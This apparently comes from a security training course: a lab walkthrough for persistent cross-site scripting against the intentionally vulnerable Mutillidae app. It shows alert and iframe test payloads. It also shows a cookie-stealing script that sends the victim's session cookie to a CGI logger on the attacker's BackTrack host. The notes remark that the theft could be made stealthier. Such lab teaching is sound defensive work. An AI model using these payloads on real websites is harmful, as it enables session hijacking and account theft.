Home »
OWASP
» OWASP Top 10 Web Hacking Final Lab 14 - Persistent Cross Site Scripting Injection #1
OWASP Top 10 Web Hacking Final Lab 14 - Persistent Cross Site Scripting Injection #1
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Start Apache2
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
| Section 8. Persistent Cross Site Script(XSS) Example #1 |
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- Basic Cross Site Scripting(XSS) Test
- Instructions:
- Place the below text in the comment box.
- <script>alert("Hello")</script>
- Click the Save Blog Entry Button
- Notes (FYI):
- This is one of the most basic vulnerability tests to see if a windows alert popup is displayed.
- View XSS Results
- Instructions:
- Click the OK Button
- Notes (FYI):
- This is a successful Cross Site Scripting(XSS) Test.
- Navigate to View Blogs
- Instructions:
- Click the View Blogs Link
- Show All Blog Entries
- Instructions:
- Select Show All
- Click the View Blog Entries Button
- View XSS Results
- Instructions:
- Click the OK Button
- Notes (FYI):
- Notice that the XSS injection from earlier was stored in the blog.
- The storing of the XSS injection is what make this type of attack Persistent. Because it never goes away until somebody clues in and protects their website.
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
- Proceed with Database Reset
- Instructions:
- Click the OK Button
| Section 9. Persistent Cross Site Script(XSS) Example #2 |
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- <iframe> Cross Site Scripting(XSS) Test
- Instructions:
- Place the below text in the comment box.
- <iframe src="http://www.cnn.com"></iframe>
- Click the Save Blog Entry Button
- Notes (FYI):
- Now we are trying to see if we can display a website inside of the blog record using the <iframe> tag.
- View <iframe> Cross Site Scripting(XSS) Results
- Instructions:
- Notice CNN is displayed in the blog.
- Notes (FYI):
- Although this is benign in nature, a malicious person could easily make this malignant in a hurry.
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
- Proceed with Database Reset
- Instructions:
- Click the OK Button
| Section 9. Persistent Cross Site Script(XSS) Example #3 |
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- Inspect Element
- Instructions:
- Right Click in the Comment Box
- Click Inspect Element
- Note(FYI):
- This is not a necessary step for the injection. The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
- Change Text Area Column Length
- Instructions:
- Change 65 to 95
- Click Close Button
- Cookie Harvest0r Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- Place the below text in the comment box.
- <SCRIPT>document.location="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie</SCRIPT>
- Click the Save Blog Entry
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Instructions:
- Click on the tab to create a new webpage.
- Note(FYI):
- Notice the PHPSESSID (aka., document.cookie) information was sent to the BackTrack cgi script.
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3).
- After you click on Add to your blog, you will again be redirected to the BackTrack CGI Havest0r script.
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Instructions:
- Click on the tab to create a new webpage.
- Note(FYI):
- Notice that almost immediately when you click on "Add to your blog" you are immediately redirected BackTrack's Cookie Havest0r Script.
- This type of exploit could be very malicious by just altering the verbose logging, where the cookie information is sent under the radar.
- Reset Database
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3).
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click the Reset DB Link
- Proceed with Database Reset
- Instructions:
- Click the OK Button
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Proof of Lab Các bạn hãy quay lại toàn bộ tiến trình thực hành và text note có tên của mình
0 comments:
Post a Comment